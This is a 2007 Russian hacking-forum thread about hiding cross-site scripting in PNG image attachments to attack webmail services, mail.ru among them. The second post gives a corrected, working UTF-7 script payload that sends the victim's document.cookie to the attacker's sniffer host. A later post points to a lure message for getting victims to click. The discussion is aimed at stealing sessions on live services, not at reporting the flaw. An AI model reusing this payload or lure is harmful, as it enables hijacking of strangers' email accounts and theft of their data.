HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Перезагрузить страницу Image XSS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Image XSS
  #1  
Старый 08.08.2007, 17:37
kalpsik
Познающий
Регистрация: 10.01.2007
Сообщений: 67
Провел на форуме:
459846

Репутация: 63
По умолчанию Image XSS
После прочтения разного материала выяснил несколько фактов:
1) Image XSS работает на всех известных мне почтовых службах(работает на момент написания поста).
2)кукисы тырятся.
3)XSS все-таки пассивная. Ибо рендеринг страницы происходит таким образом, что при вставке картинки непосредственно в тело письма, браузер не обрабатывает вложеный в нее код=(
4)данная XSS лично у меня заработала только с png-форматом=(

код вшитый в png'шку стандартный:
Код:
<script></script>
мэйл.ру обрабатывает на ура=)

осталась пара непоняток:
если вставить код наподобие
Код:
<html><meta http-equiv="Content-Type" content="text/html" charset="UTF-7">+ADw-script+AD4-сам скрипт+ADw-/script+AD4-
то например знак + не обрабатывается браузером....
и самое главное, как все-таки раскрутить активный XSS методом Image XSS?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 08.08.2007, 23:55
LeverOne
Познающий
Регистрация: 22.02.2006
Сообщений: 67
Провел на форуме:
4155100

Репутация: 2033
По умолчанию
1. У тебя там русские буквы "сам скрипт", поэтому теги скрипта не определятся.
2. Контент неправильно задан.
3. Чтобы решить проблему с плюсом, используй явный метод конкатенации.
В картинку-аттач вставляй это

Код:
<html><meta http-equiv="Content-Type" content="text/html; charset=UTF-7">+ADw-script+AD4-img=new Image;img.src='http://твой_снифф?'.concat(document.cookie);+ADw-/script+AD4-
Обрати внимание на запись атрибута content.

4. Никакой кодировки UTF-7 (если мы говорим о мейл.ру) на данный момент не требуется. Отправляй аттач не с майл.ру.

Чтобы вытянуть из этого активную(ые), нужно взглянуть на проблему шире.
 
Ответить с цитированием

  #3  
Старый 09.08.2007, 17:22
kalpsik
Познающий
Регистрация: 10.01.2007
Сообщений: 67
Провел на форуме:
459846

Репутация: 63
По умолчанию
слова "сам скрипт" - означает, что вместо этого у иеня там стоит скрипт=)
то что на mail.ru не требуется кодировки UTF-7 - я написал в своем посте.
вот на счет взгляда шире, можно поподробнее? можно в личку можно в аську=)
 
Ответить с цитированием

  #4  
Старый 09.08.2007, 20:31
LeverOne
Познающий
Регистрация: 22.02.2006
Сообщений: 67
Провел на форуме:
4155100

Репутация: 2033
По умолчанию
Цитата:
Сообщение от kalpsik  
вот на счет взгляда шире, можно поподробнее? можно в личку можно в аську=)
Отлично! А можно сразу сюда _http://win.mail.ru/cgi-bin/support ?

И на кой тебе активная в самой почте? Интересно - ищи сам. А вообще тебе более подошло бы юзать это

http://forum.antichat.ru/showpost.ph...4&postcount=11

"Вася/Маша я тебя убью/люблю! ссылка на дневник"

Но поторопись! Ибо,ибо...
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
Broken image, при использовании XSS через аватару Qwazar PHP 8 15.04.2006 09:02



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.